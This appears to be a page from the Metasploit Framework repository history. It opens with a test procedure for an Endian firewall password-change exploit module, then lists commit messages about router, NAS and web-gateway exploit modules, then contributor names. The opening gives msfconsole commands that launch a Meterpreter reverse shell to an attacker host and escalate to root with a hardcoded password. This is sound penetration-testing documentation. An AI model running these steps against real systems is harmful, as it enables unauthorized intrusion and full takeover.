- Enter "proxyuser" for the username, and "password123" for the
password, or modify the directions below this point accordingly.
- Click the _Create user_ button.
- If prompted to apply the settings, do so.
Module test process:
From within the MSF console, execute these commands:
use exploit/linux/http/efw_chpasswd_exec
set payload linux/x86/meterpreter/reverse_tcp
set LHOST [YOUR_HOST_IP]
set LPORT 443
set RHOST [ENDIAN_GREEN_IP]
set EFW_USERNAME proxyuser
set EFW_PASSWORD password123
exploit
Once Meterpreter connects, execute the following Meterpreter
commands:
getuid
sysinfo
shell
Within the OS shell, execute the following commands:
whoami
uname -a
sudo -l
sudo /usr/local/bin/chrootpasswd
It will appear as though the command has hung, but it is actually
waiting for input. Type "IlikerootaccessandIcannotlie", then press
enter.
Execute the following OS command in the shell:
su
Type "IlikerootaccessandIcannotlie", then press enter.
Verify root access (whoami, etc.).
2015-06-29 12:03:17 -07:00
c8dddbff70
server header
2015-06-24 21:32:01 +02:00
8bc012a665
echo stager via upload vulnerability
2015-06-23 23:09:08 +02:00
d8e11789ea
cmd_interact - first try
2015-06-20 07:59:25 +02:00
c2f0973ed0
Report attempt_time
2015-06-19 10:31:50 -05:00
fb9ad663f7
Change to Metasploit::Model::Login::Status::SUCCESSFUL
2015-06-18 23:42:16 -05:00
145637470a
port, email, cleanup
2015-06-14 08:27:23 +02:00
1b040f3374
dsp-w110-command-injection
2015-06-13 21:45:56 +02:00
744baf2d44
Update kloxo_sqli to use the new cred API
2015-06-03 23:28:35 -05:00
c8123c147f
upnp vs hnap
2015-05-05 20:57:05 +02:00
73f7885eea
add comment
2015-05-29 23:08:55 +02:00
1be04a9e7e
Land #5182 , @m-1-k-3's exploit for Dlink UPnP SOAP-Header Injection
2015-05-29 14:49:09 -05:00
8b2e49eabc
Do code cleanup
2015-05-29 14:45:47 -05:00
9ccf04a63b
Land #5420 , @m-1-k-3's miniigd command injection module (ZDI-15-155)
2015-05-29 13:29:03 -05:00
9ebd6e5d6e
Use REXML
2015-05-29 13:27:19 -05:00
294fa78c1f
Land #5430 , @m-1-k-3's adding specific endianess Arch to some exploits
2015-05-29 11:43:25 -05:00
dd39d196f5
Land #5226 , @m-1-k-3's Airties login Buffer Overflow exploit
2015-05-29 10:51:32 -05:00
952f391fb4
Do minor code cleanup
2015-05-29 10:49:51 -05:00
666b0bc34a
MIPSBE vs MIPS
2015-05-28 18:50:48 +02:00
43f505b462
fix contact details
2015-05-25 19:31:50 +02:00
f953dc08d9
Land #5280 , @m-1-k-3's support for Airties devices to miniupnpd_soap_bof
2015-05-24 15:17:38 -05:00
10baf1ebb6
echo stager
2015-05-23 15:50:35 +02:00
f423306b6f
Various post-commit fixups
...
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed
in #5150 , @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys
Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
first landed in #5192 , @joevennix's module for Safari CVE-2015-1126
Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in
Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in #5016 ,
add SSL Labs scanner
Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed
in #5101 , Add Directory Traversal for GoAhead Web Server
Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first
landed in #5158 , OWA internal IP disclosure scanner
Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
first landed in #5159 , WordPress Mobile Edition Plugin File Read Vuln
Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed
in #4924 , @m-1-k-3's DLink CVE-2015-1187 exploit
Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first
landed in #5131 , WordPress Slideshow Upload
Edited modules/exploits/windows/local/run_as.rb first landed in #4649 ,
improve post/windows/manage/run_as and as an exploit
(These results courtesy of a delightful git alias, here:
```
cleanup-prs = !"for i in `git status | grep modules | sed
s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git
log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo
''; done"
```
So that's kind of fun.
2015-05-06 11:39:15 -05:00
c7e05448e7
various MIPS vs MIPSBE fixes
2015-05-04 12:55:21 +02:00
53043dcbbc
make msftidy happy
2015-05-03 18:14:51 +02:00
6fbce56a52
realtek upnp command injection
2015-05-03 18:09:22 +02:00
1bc6822811
Delete Airties module
2015-05-22 11:57:45 -05:00
70d0bb1b1a
Merge Airties target inside miniupnpd_soap_bof
2015-05-22 11:57:19 -05:00
d8b8017e0b
remove debugging
2015-04-27 06:36:34 +02:00
8db88994ac
fingerprint, title
2015-04-27 06:34:46 +02:00
285d767e20
initial commit of UPnP exploit for Airties devices
2015-04-27 05:34:30 +02:00
f5b0a7e082
include rop gadget description
2015-04-23 00:11:02 +02:00
1ec0e09a43
msftidy
2015-04-22 10:32:47 +02:00
58099d0469
airties login bof module
2015-04-22 10:21:58 +02:00
3f40342ac5
Fix sock_sendpage
2015-04-21 14:17:19 -05:00
ab94f15a60
Take care of modules using the 'DEBUG' option
2015-04-21 12:13:40 -05:00
4224008709
Delete print_debug/vprint_debug
2015-04-21 11:14:03 -05:00
b991dec0f9
Dlink UPnP SOAP-Header Injection
2015-04-17 22:54:32 +02:00
4f903a604c
Fix #5103 , Revert unwanted URI encoding
...
Fix #5103 . By default, Httpclient will encode the URI but
we don't necessarily want that. These modules originally
didn't use URI encoding when they were written so we should
just keep them that way.
2015-04-17 13:59:49 -05:00
153344a1dd
fix Unkown typo
2015-04-16 23:59:28 +02:00
352e170624
more failure reasons
2015-04-16 22:04:11 +02:00
ba6548db75
be consistent about naming
2015-04-16 21:44:56 +02:00
a193ae42b0
moar fail_with's
2015-04-16 21:25:05 +02:00
4dc402fd3c
moar fail_with's
2015-04-16 21:16:52 +02:00
0e186fa617
first fail_with fixes
2015-04-16 21:08:33 +02:00
ef6bf54e2f
Fix metadata
2015-04-15 09:22:59 -05:00
1da6b32df7
Land #4924 , @m-1-k-3's DLink CVE-2015-1187 exploit
...
* ncc service ping.cpp command injection
2015-04-15 09:17:10 -05:00
6019bbe0d2
Add ranking comment
2015-04-15 09:12:03 -05:00
ad465c4d5b
Do code cleanup
2015-04-15 09:10:18 -05:00
11057e5b3b
Fix up the last couple from Tenable, missed last
...
[See #5012 ]
2015-04-02 15:27:46 -05:00
4bbec88882
Various other one-off nonhuman author credits
...
[See #5012 ]
2015-04-02 15:25:47 -05:00
b17727d244
Switching to privileged => false
2015-04-01 14:35:45 -05:00
0825534d2c
Fix reference
2015-04-01 14:16:45 -05:00
8ec71e9daf
Add a module for R7-2015-05
2015-04-01 14:05:41 -05:00
d81a246660
target_uri
2015-03-26 12:16:20 +01:00
b7f469b747
feedback
2015-03-26 07:39:36 +01:00
49a6057f74
Grammaring harder
2015-03-24 11:10:36 -05:00
2d1adf6ef4
Land #4923 , @m-1-k-3's exploit for overflow on belkin routers
2015-03-22 02:05:35 -05:00
ee74bb3c5b
The default concat operator should be ok
2015-03-22 02:05:02 -05:00
5499b68e02
Do code cleanup
2015-03-22 01:58:32 -05:00
1b67a06d35
No banner var
2015-03-20 02:26:59 -05:00
b55ffc9ff1
Change option to FORCE_EXPLOIT
2015-03-20 01:44:10 -05:00
d8539ef91a
Change datastore option's description
2015-03-19 12:22:42 -05:00
a2ba81f84f
This should be true (required)
2015-03-19 11:54:03 -05:00
d8c8bd1669
Move the details to a wiki
2015-03-19 11:52:17 -05:00
968a8758ad
Add CVE-2015-0235 Exim GHOST (glibc gethostbyname) Buffer Overflow
...
This was originally written by Qualys
2015-03-18 18:51:16 -05:00
4d3a1a2f71
fix all duplicated keys in modules
2015-03-14 13:10:42 +01:00
819a49b28a
msftidy again
2015-03-12 19:09:52 +01:00
2eab258a76
msftidy
2015-03-12 19:07:56 +01:00
ccf7314c8f
msftidy
2015-03-12 19:05:21 +01:00
6fcab31997
ncc exploit CVE-2015-1187 - dir626l
2015-03-12 18:55:50 +01:00
64f769504b
encoding
2015-03-10 17:47:15 +01:00
6657c7d11d
Belkin - CVE-2014-1635
2015-03-10 16:49:51 +01:00
ecd7ae9c3b
Land #4857 , symantec_web_gateway_restore module
2015-03-02 15:00:10 -06:00
ad28f9767f
Use include
2015-03-02 14:41:25 -06:00
cb140434f9
Update
2015-03-02 12:59:21 -06:00
905a539a00
Add exploit for Seagate Business NAS devices
...
This module is an exploit for a pre-authenticated remote code execution
vulnerability in Seagate Business NAS products.
2015-03-01 13:25:28 +10:00
4a1fbbdc3b
Use datastore to find payload name
2015-02-28 19:56:32 -06:00
ef9196ba6c
Correct comment
2015-02-27 13:27:49 -06:00
7b6c39058a
Correct target name
2015-02-27 13:24:57 -06:00
90aff51676
Add CVE-2014-7285, Symantec Web Gateway restore.php Command Injection
2015-02-27 12:31:29 -06:00
0372b08d83
Fix mixin usage on modules
2015-02-13 17:17:59 -06:00
bae19405a7
Various grammar, spelling, word choice fixes
2015-01-26 11:00:07 -06:00
b61538e980
Land #4291 , @headlesszeke's module for ARRIS VAP2500 command execution
2015-01-21 20:52:31 -06:00
33195caff2
Mark compatible payloads
2015-01-21 20:52:04 -06:00
500d7159f1
Use PAYLOAD instead of CMD
2015-01-21 20:49:05 -06:00
f37ac39b4c
Split exploit cmd vs exploit session
2015-01-21 20:46:37 -06:00
e1d1ff17fd
Change failure code
2015-01-21 20:38:33 -06:00
169052af5c
Use cookie option
2015-01-21 20:37:38 -06:00
d45cdd61aa
Resolve #4507 - respond_to? + send = evil
...
Since Ruby 2.1, the respond_to? method is more strict because it does
not check protected methods. So when you use send(), clearly you're
ignoring this type of access control. The patch is meant to preserve
this behavior to avoid potential breakage.
Resolve #4507
2015-01-02 13:29:17 -06:00
264d3f9faa
Minor grammar fixes on modules
2014-12-31 11:45:14 -06:00
121c0406e9
Beautify restart_command creation
2014-12-24 15:52:15 -06:00
43ec8871bc
Do minor c code cleanup
2014-12-24 15:45:38 -06:00
92113a61ce
Check payload
2014-12-24 15:43:49 -06:00
h00die
jvoisin
William Vu
Julien (jvoisin) Voisin
Pearce Barry
Brent Cook
Brendan
Mehmet Ince
David Maloney
Thao Doan
Jan Mitchell
aushack
catatonic
Quentin Kaiser
wchen-r7
Pedro Ribeiro
Vex Woo
James Lee
forzoni
h00die
benpturner
William Webb
Francesco
sho-luv
Nicholas Starke
greg.mikeska@rapid7.com
Steven Seeley
Adam Cammack
Christian Mehlmauer
joev
Brendan Coles
Jon Hart
dmohanty-r7
karllll
HD Moore
m0t
Tod Beardsley
jvazquez-r7
Michael Messner
Ben Lincoln
aos
m-1-k-3
Sven Vetsch
OJ